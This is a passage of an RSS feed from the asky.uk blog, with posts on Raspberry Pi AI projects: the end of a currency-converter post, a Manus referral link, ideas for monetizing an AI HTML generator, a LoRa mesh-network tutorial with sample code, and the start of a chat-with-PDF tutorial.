hardware.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The euro currency converter is a practical example of what can be achieved when AI technology and Raspberry Pi hardware are combined.&lt;br&gt;It is fast, multilingual, self-updating, and completely self-hosted — a perfect demonstration of the direction in which asky.uk continues to evolve:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;lightweight, intelligent, AI-built tools running on small, affordable hardware.&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a rel="nofollow" href="https://asky.uk/convertor/"&gt;CONVERTOR&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://globalfintechseries.com/wp-content/uploads/AI-and-Machine-Learning_-Transforming-Payment-Systems-and-Global-Money-Exchange-4-960x720.jpg" style="height:440px; width:588px"&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/102/built-powered-language-currency-converter-hosted-raspberry</guid>
<pubDate>Sat, 29 Nov 2025 21:47:43 +0000</pubDate>
</item>
<item>
<title>Have you tried Manus yet?</title>
<link>https://asky.uk/101/have-you-tried-manus-yet</link>
<description>&lt;p&gt;One of the perfect AI tools through which you can bring any of your projects to success&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;a rel="nofollow" href="https://manus.im/invitation/UZB1H0LZDHLS"&gt;MANUS&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/101/have-you-tried-manus-yet</guid>
<pubDate>Sat, 15 Nov 2025 15:43:17 +0000</pubDate>
</item>
<item>
<title>Monetizing a Asky AI Bot</title>
<link>https://asky.uk/100/monetizing-a-asky-ai-bot</link>
<description>&lt;p&gt;Building an &lt;a rel="nofollow" href="https://asky.uk/76/welcome-to-asky-ai-raspberry-pi-2-power"&gt;&lt;strong&gt;AI-powered project&lt;/strong&gt; &lt;/a&gt;such as an HTML/CSS generator is fun, but turning it into a sustainable source of income requires clear monetization strategies. If you don’t want to rely solely on AdSense, here are practical alternatives that don’t require user accounts or heavy data collection (important for GDPR and privacy compliance).&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;1. &lt;strong&gt;One-Time Digital Product Sales&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Instead of subscriptions, you can package outputs as downloadable assets:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Static bundles&lt;/strong&gt;: pre-designed templates, CSS themes, or landing page packs.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Customized bundles&lt;/strong&gt;: the app generates a ZIP file tailored to the user’s description.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use Stripe Checkout, PayPal Buy Now, or Gumroad/Payhip for transactions.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Deliver via expiring download links (e.g., valid for 1 hour).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Price range: £1–£10 for small templates, £10–£30 for bundles.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This model is simple, requires minimal personal data, and is compatible with small traffic volumes.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;2. &lt;strong&gt;Freemium With Pay-Per-Use&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Keep the app free for light use, but charge for “power features”:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;More than 1–2 generations per day.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Access to advanced templates (responsive, dark/light modes).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Direct code download (instead of copy/paste).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add a “Buy More Generations” button.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Stripe Payment Links can sell credits (e.g., 20 generations for £5).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;No accounts: you can deliver credits via ephemeral tokens, emailed codes, or even short-lived cookies.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;3. &lt;strong&gt;Premium API Access&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Your AI app could also work as a micro-API:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Example endpoint: &lt;code&gt;/generate_html?desc=blue+login+form&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Free for hobbyists (limited calls/day).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Paid tier for developers who want to integrate it into their own workflows.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Host the API behind RapidAPI or Stripe-based usage credits.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Good for attracting other programmers and SaaS builders.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This option scales better than selling static templates but requires stable uptime and rate-limiting.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;4. &lt;strong&gt;Pay-What-You-Want Donations (Enhanced)&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;While “donate” buttons are common, they can be made more compelling:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Offer a &lt;strong&gt;bonus file&lt;/strong&gt; or &lt;strong&gt;extended functionality&lt;/strong&gt; when someone donates (e.g., a premium template).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Integrate BuyMeACoffee, Ko-fi, or Stripe’s “tip jar” feature.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Minimal dev work, no data storage.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Works best if you already have traffic from open-source communities or learners.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;5. &lt;strong&gt;Plugins &amp;amp; Marketplace Integrations&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Instead of only offering a web tool, wrap your AI generator into a product for existing ecosystems:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;WordPress plugin&lt;/strong&gt;: “Generate CSS blocks from plain English.”&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Shopify app&lt;/strong&gt;: “AI quick theme tweaks.”&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;VS Code extension&lt;/strong&gt;: “Generate HTML snippets in editor.”&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Start with a simple downloadable plugin.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Sell it as a one-time purchase (£10–£20) on marketplaces.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This approach extends reach beyond your own site and makes revenue more stable.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;6. &lt;strong&gt;Fiverr / Upwork Automation&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Turn the tool into a semi-passive service:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Create a Fiverr gig: “I’ll generate a responsive HTML/CSS template with AI.”&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Behind the scenes, clients interact with your tool instead of you coding manually.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Delivery can be automated: payment → webhook → file generation → delivery.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Reuse the same code as your app, just wrap it for gig platforms.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Can generate £20–£200/month even at low traffic, depending on pricing.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Pricing Tips&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Low-friction pricing&lt;/strong&gt; (under £5) works best for instant purchases.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Bundles&lt;/strong&gt; (£10–£30) are attractive for small business owners or students.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;For developers, &lt;strong&gt;API credits&lt;/strong&gt; are more natural (£5–£15 per 1,000 requests).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Legal &amp;amp; Privacy Considerations&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use Stripe, PayPal, or Gumroad — they handle payment security and compliance.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Keep a minimal &lt;strong&gt;privacy policy&lt;/strong&gt;: clearly state that no personal data is stored.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;For EU/UK: digital product sales may be subject to VAT — keep that in mind if scale grows.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;Conclusion&lt;/p&gt;&lt;p&gt;AdSense may bring a trickle of revenue, but &lt;strong&gt;the real opportunity lies in direct monetization of what your AI app creates&lt;/strong&gt;. Selling small, useful digital products or offering pay-per-use access can generate anywhere from a few pounds to a few hundred pounds per month, all without user accounts or storing personal data.&lt;/p&gt;&lt;p&gt;Start simple: package one or two template bundles, add a “Buy Now” button, and deliver via expiring download links. Once you see traction, consider expanding into APIs, plugins, or marketplaces.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://i.ibb.co/PZcsKqDL/Screenshot-2025-07-18-at-07-26-45-Asky-AI-Home.png" style="height:226px; width:772px"&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/100/monetizing-a-asky-ai-bot</guid>
<pubDate>Wed, 17 Sep 2025 07:57:36 +0000</pubDate>
</item>
<item>
<title>Building an AI-Powered LoRa Mesh Network on Raspberry Pi 5: A Community Communication Project for Small Villages</title>
<link>https://asky.uk/99/building-powered-raspberry-community-communication-villages</link>
<description>&lt;p&gt;In remote or underserved areas, reliable communication can be a challenge due to limited internet access or infrastructure. This project outlines how to create a small-scale, decentralized communication network using Raspberry Pi 5 boards equipped with LoRa (Long Range) modules. The network is designed to support 50-100 users in a small populated place, such as a village, enabling text-based messaging, data sharing, and basic alerts without relying on cellular or Wi-Fi networks.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://thepihut.com/cdn/shop/products/sx1268-lora-hat-for-raspberry-pi-433mhz-waveshare-wav-16804-30032679239875_800x.jpg?v=1646139975" style="height:800px; width:800px"&gt;&lt;br&gt;To add intelligence, we'll integrate AI capabilities on the Raspberry Pi 5 using lightweight models like TensorFlow Lite. The AI can handle tasks such as automated message routing, sentiment analysis for community alerts (e.g., detecting urgent messages), or even simple natural language processing (NLP) for chat moderation. LoRa's low-power, long-range capabilities (up to several kilometers in open areas) make it ideal for mesh networking, where devices relay messages to extend coverage.&lt;br&gt;&lt;br&gt;This setup assumes a mesh topology, where each user's device acts as a node, relaying data to others. For 50-100 users, you'll need multiple nodes, but we'll focus on building a single node prototype that can be replicated.&lt;br&gt;&lt;br&gt;&amp;nbsp;Key Benefits:&lt;br&gt;- Low cost: Each node costs around $100-150.&lt;br&gt;- Energy efficient: Suitable for solar-powered setups in off-grid areas.&lt;br&gt;- Privacy-focused: Decentralized, no central server required.&lt;br&gt;- Scalable: Easily expand by adding more nodes.&lt;br&gt;&lt;br&gt;&amp;nbsp; Estimated Range and Capacity:&amp;nbsp;&lt;br&gt;- LoRa can cover 2-10 km per hop depending on terrain and antenna.&lt;br&gt;- For 50-100 users, aim for 10-20 gateway nodes to handle traffic, with users connecting via simple LoRa-enabled devices (e.g., smartphones with LoRa adapters or dedicated handhelds).&lt;br&gt;&lt;br&gt;&amp;nbsp; Required Components&lt;br&gt;&lt;br&gt;For a single node (Raspberry Pi 5 as a gateway/router):&lt;br&gt;- Raspberry Pi 5 (4GB or 8GB model recommended for AI tasks).&lt;br&gt;- LoRa module: SX1276/SX1278-based HAT or breakout board (e.g., Dragino LoRa HAT or Waveshare SX1262).&lt;br&gt;- Antenna: High-gain outdoor antenna (5-9 dBi) for better range.&lt;br&gt;- Power supply: 5V/3A USB-C adapter; consider solar panels for remote deployment.&lt;br&gt;- Storage: 16GB+ microSD card with Raspberry Pi OS (Lite version for efficiency).&lt;br&gt;- Display/Keyboard (optional for setup): HDMI monitor and USB peripherals.&lt;br&gt;- Enclosure: Weatherproof case for outdoor use.&lt;br&gt;- Additional for AI: USB accelerator like Coral TPU (optional for faster inference).&lt;br&gt;&lt;br&gt;For user endpoints (simpler nodes):&lt;br&gt;- ESP32 or Arduino boards with LoRa modules (cheaper alternatives to full Pi setups for end-users).&lt;br&gt;- Mobile app integration: Use Bluetooth to connect smartphones to LoRa nodes.&lt;br&gt;&lt;br&gt;Total cost per gateway node: ~$120. Scale up by distributing simpler nodes to users.&lt;br&gt;&lt;br&gt;&amp;nbsp;Step-by-Step Instructions&lt;br&gt;&lt;br&gt;&amp;nbsp;Step 1: Hardware Assembly&lt;br&gt;1.&amp;nbsp; &amp;nbsp;Set up the Raspberry Pi 5:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Insert the microSD card with Raspberry Pi OS installed (download from raspberrypi.com and flash using Raspberry Pi Imager).&lt;br&gt;&amp;nbsp; &amp;nbsp;- Connect the LoRa HAT/module to the Pi's GPIO pins. For Dragino HAT, align pins and secure.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Attach the antenna to the LoRa module's connector.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Power on the Pi and boot into the OS.&lt;br&gt;&lt;br&gt;2.&amp;nbsp; &amp;nbsp;Test Connections:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- SSH into the Pi (enable SSH in raspi-config).&lt;br&gt;&amp;nbsp; &amp;nbsp;- Verify LoRa module: Run `ls /dev` to check for `/dev/spidev0.0` (SPI interface).&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Step 2: Software Installation&lt;br&gt;1.&amp;nbsp; &amp;nbsp;Update System:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y&lt;br&gt;&amp;nbsp; &amp;nbsp;sudo apt install python3-pip git -y&lt;br&gt;&amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;2.&amp;nbsp; Install LoRa Libraries:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Use PyLoRa or LoRaWAN libraries. Clone a mesh networking library like Meshtastic (which supports LoRa for chat networks).&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;git clone https://github.com/meshtastic/Meshtastic-python.git&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;cd Meshtastic-python&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install -r requirements.txt&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- Alternatively, for custom setup: Install `RPi.GPIO` and `spidev`.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install RPi.GPIO spidev&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;3.&amp;nbsp; &amp;nbsp;Install AI Frameworks:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- TensorFlow Lite for edge AI:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;sudo apt install libatlas-base-dev -y&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install tensorflow-lite&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- For NLP/sentiment analysis, add Hugging Face's Transformers (lite version):&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install transformers torch&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- Download a pre-trained model, e.g., DistilBERT for sentiment:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;from transformers import pipeline&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;classifier = pipeline('sentiment-analysis')&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Step 3: Configure LoRa Mesh Network&lt;br&gt;1.&amp;nbsp; &amp;nbsp;Set Up LoRa Parameters:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Frequency: Use 433MHz, 868MHz, or 915MHz based on your region's regulations (check local laws).&lt;br&gt;&amp;nbsp; &amp;nbsp;- In code, configure spreading factor (SF7-SF12) for range vs. speed trade-off. Higher SF for longer range but slower data.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Example Python script for basic send/receive:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```python&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;import time&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;import LoRa&amp;nbsp; # Assuming PyLoRa library&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora = LoRa.LoRa(verbose=False)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_mode(LoRa.MODE.STDBY)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_freq(915.0)&amp;nbsp; # Adjust frequency&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_spreading_factor(7)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;# Send message&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.write_payload([ord(c) for c in "Hello LoRa!"])&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_mode(LoRa.MODE.TX)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;time.sleep(1)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;# Receive loop&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if lora.received_packet():&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;payload = lora.read_payload()&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;print("".join(chr(b) for b in payload))&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;2.&amp;nbsp; &amp;nbsp;Implement Mesh Topology:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Use libraries like PainlessMesh or adapt Meshtastic for LoRa.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Each node broadcasts its ID and relays messages if not the destination.&lt;br&gt;&amp;nbsp; &amp;nbsp;- For 50-100 users: Limit hops to 3-5 to avoid latency. Use channel hopping to reduce interference.&lt;br&gt;&lt;br&gt;3.&amp;nbsp; &amp;nbsp;Integrate AI:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Message Routing with AI: Use a simple ML model to predict optimal routes based on signal strength history.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Collect data: Log RSSI (Received Signal Strength Indicator) from LoRa packets.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Train a basic model (e.g., scikit-learn on Pi):&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install scikit-learn&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Example: Linear regression for path prediction.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Sentiment Analysis for Alerts: Analyze incoming messages.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```python&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;from transformers import pipeline&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;classifier = pipeline('sentiment-analysis', model='distilbert-base-uncased-finetuned-sst-2-english')&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;def analyze_message(msg):&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;result = classifier(msg)[0]&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if result['label'] == 'NEGATIVE' and result['score'] &amp;gt; 0.8:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;return "Alert: Potential emergency!"&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;return "Normal message"&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;# Integrate into receive loop&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;msg = "".join(chr(b) for b in payload)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;print(analyze_message(msg))&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- NLP for Moderation: Filter spam or translate messages using lightweight models.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Run AI on boot: Use systemd service to start scripts.&lt;br&gt;&lt;br&gt;### Step 4: User Interface and Deployment&lt;br&gt;1. Build a Simple App:&lt;br&gt;&amp;nbsp; &amp;nbsp;- Web-based UI: Use Flask on Pi.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install flask&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Create a dashboard for sending/receiving messages.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Mobile Integration: Pair with Bluetooth for smartphone access (use BlueZ on Pi).&lt;br&gt;&amp;nbsp; &amp;nbsp;- For end-users: Distribute ESP32-LoRa kits with a simple LCD/button interface.&lt;br&gt;&lt;br&gt;2.&amp;nbsp; &amp;nbsp;Network Deployment:&lt;br&gt;&amp;nbsp; &amp;nbsp;- Place gateway Pis on high points (roofs, hills) for coverage.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Test range: Start with 2-3 nodes, send messages, measure latency.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Scale: Assign unique IDs to users. Use encryption (e.g., AES via pycryptodome) for privacy.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Power Management: Enable sleep modes on LoRa for battery life.&lt;br&gt;&lt;br&gt;3.&amp;nbsp; &amp;nbsp;Testing and Optimization:&lt;br&gt;&amp;nbsp; &amp;nbsp;- Simulate 50-100 users: Use multiple virtual nodes or scripts to flood messages.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Monitor with AI: Implement anomaly detection to flag network issues.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Bandwidth: LoRa is low-data ( ~0.3-50 kbps), so limit to text/short data.&lt;br&gt;&lt;br&gt;&amp;nbsp; Challenges and Considerations&lt;br&gt;- Regulatory Compliance: Ensure LoRa frequency use is legal in your area (e.g., FCC in US, ETSI in Europe).&lt;br&gt;- Security:Add authentication to prevent unauthorized access.&lt;br&gt;- Scalability Limits: For &amp;gt;100 users, consider hybrid with Wi-Fi gateways.&lt;br&gt;- AI Performance: Raspberry Pi 5's NPU helps, but heavy models may need optimization or offloading.&lt;br&gt;- Maintenance:Remote SSH for updates; use Watchdog for reliability.&lt;br&gt;&lt;br&gt;&amp;nbsp;Conclusion&lt;br&gt;This AI-enhanced LoRa mesh network on Raspberry Pi 5 empowers small communities with resilient communication. By following these steps, you can prototype a node in a weekend and deploy a full network in weeks. Experiment, iterate, and share your improvements—open-source the code on GitHub for community benefit!&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/99/building-powered-raspberry-community-communication-villages</guid>
<pubDate>Sun, 07 Sep 2025 11:52:53 +0000</pubDate>
</item>
<item>
<title>Turn Your Raspberry Pi into a Chat-with-PDF AI Assistant</title>
<link>https://asky.uk/98/turn-your-raspberry-pi-into-a-chat-with-pdf-ai-assistant</link>
<description>&lt;hr&gt;&lt;h1&gt; Turn Your Raspberry Pi into a Chat-with-PDF AI Assistant&lt;/h1&gt;&lt;div&gt;&lt;img alt="" src="https://www.pdfgear.com/how-to/img/best-ai-to-chat-with-any-pdf-1.png" style="height:540px; width:900px"&gt;&lt;/div&gt;&lt;p&gt;The Raspberry Pi 5 is powerful enough to handle some surprisingly advanced AI tasks. Today, we’ll show you how to build a &lt;strong&gt;Chat-with-PDF Assistant&lt;/strong&gt; on your Pi — a local tool that lets you upload PDF files and ask questions about them using natural language, just like ChatGPT.&lt;/p&gt;&lt;p&gt;No need for the cloud. Everything runs &lt;strong&gt;locally&lt;/strong&gt; on your Raspberry Pi.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; What You’ll Build&lt;/h2&gt;&lt;p&gt;A local AI assistant that can:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Ingest PDF files&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Convert text to vector embeddings&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Accept questions in plain English&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Answer based on PDF contents&lt;br&gt;All without sending your documents to the cloud.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; What You’ll Need&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi 5&lt;/strong&gt; (or Pi 4 with swap enabled)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;64-bit Raspberry Pi OS&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Python 3.9+&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;pip&lt;/strong&gt; and &lt;strong&gt;virtualenv&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;PDF document(s)&lt;/strong&gt; to test with&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Internet connection (initial setup only)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; Step 1: Install Required Packages&lt;/h2&gt;&lt;p&gt;First, update your Pi and install basic dependencies:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
sudo apt install python3-pip python3-venv
